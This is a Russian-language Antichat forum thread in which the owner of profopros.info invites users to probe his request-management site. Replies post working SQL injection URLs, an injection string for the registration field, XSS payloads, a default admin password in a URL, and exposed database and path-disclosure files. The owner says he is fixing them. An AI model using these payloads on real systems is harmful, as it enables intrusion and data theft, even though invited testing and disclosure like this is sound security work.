Форум АНТИЧАТ - Проверьте profopros.info

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - Проверьте profopros.info (https://forum.antichat.xyz/showthread.php?t=115941)

Проверьте profopros.info

Собственно сайт для автоматизации работы мне.
Он автоматизирует управление заявками.

Поэтому просьба проверить на баги.

zhehek 12345

Заранее спасибо

пассивная xss
уязвимое поле :рассылка
пример:<script>alert(/xss/)</script>

SQL ENJECTON http://profopros.info/index.php?do=statya_more&id=3+union+select+1,versi on(),user(),4,5+--

SQL-INJ
http://profopros.info/index.php?do=news_more&id=-1+UNION+SELECT+1,2,3,version(),5,6+--+-

Активная XSS в гостевой

Код:

[img]javascript:alert()[/img]

Пассивная XSS
http://profopros.info/subscribe/addemail.php?email=<script>alert()</script>

Дефолтный пароль на админку подписки на рассылку
http://profopros.info/subscribe/admin.php?pswrd=admin

SQL-INJ в регистрации
Регаемся с ником

логин','пароль',version(),'1231','111', '111','111','111')#

Цитата:

Ваш Логин: 222
Посл. ip :xxx
Счет : 1231 р. [+]

В профиле -

Цитата:

Почтовый ящик: 5.0.67-percona-highperf-b7-log

Примерно так же и в смене пароля в профиле.

Активка(XSS) в подачи заявок...
В описание:

Цитата:

"><script>alert('XSS by Hormold. Cookie saved');</script><h1>xss</h1>

В поле email можно так:

Цитата:

Удаче в бизе!
;)

----------------------------
BlackSun: активная она только для того, кто подавал заявку, насчет админа нет уверенности
UPD: проверил, у админа пашет.

Расскрытие путей почему-то выбило:
http://profopros.info/subscribe/admin.php

Код:

Parse error: syntax error, unexpected '<' in [path]/profopros.info/subscribe/config.php on line 3

хе, знакомый двиг

когда то покупал первую версию

вот это удали http://profopros.info/db.sql

\\\\\\\\\ мля у ТСа и покупал))))))))

http://profopros.info/index.php?do=show_profile&login=admin
вот это крутой двиг. пассы нашару всем раздаем =)

Файл test.php раскрывает пути, но это я так понимаю временный файл.
readme.txt, db.sql - тоже какие-то сомнительные файлы с описанием
Админка для счетчика counter/admin.php и снова сомнительный файл с инфой
counter/info.txt

Раскрытие путей в /subscribe/addemail.php в переменной email
И если в хидере запроса задать в User-Agent: client-ip: например 123456789
Так же если в кукисах PHPSESSID оставить пустой.

Вообщем ничего такого сверх интересного, а остальное уже написали выше.

Цитата:

хе, знакомый двиг

когда то покупал первую версию

вот это удали http://profopros.info/db.sql

\\\\\\\\\ мля у ТСа и покупал))))))))

Да..Тока от старого двига остался только дизайн))) он переделан на 99%.
спс базу переименовал %)

Цитата:

http://profopros.info/index.php?do=show_profile&login=admin
вот это крутой двиг. пассы нашару всем раздаем =)

А это видимо последствия теста) Ща профиксим

Цитата:

Файл test.php раскрывает пути, но это я так понимаю временный файл.
readme.txt, db.sql - тоже какие-то сомнительные файлы с описанием
Админка для счетчика counter/admin.php и снова сомнительный файл с инфой
counter/info.txt

Раскрытие путей в /subscribe/addemail.php в переменной email
И если в хидере запроса задать в User-Agent: client-ip: например 123456789
Так же если в кукисах PHPSESSID оставить пустой.

Вообщем ничего такого сверх интересного, а остальное уже написали выше.

да тест временный.Остальные тоже. Все фикс.

Всем спасибо жду еще) в течении часа профиксю все баги.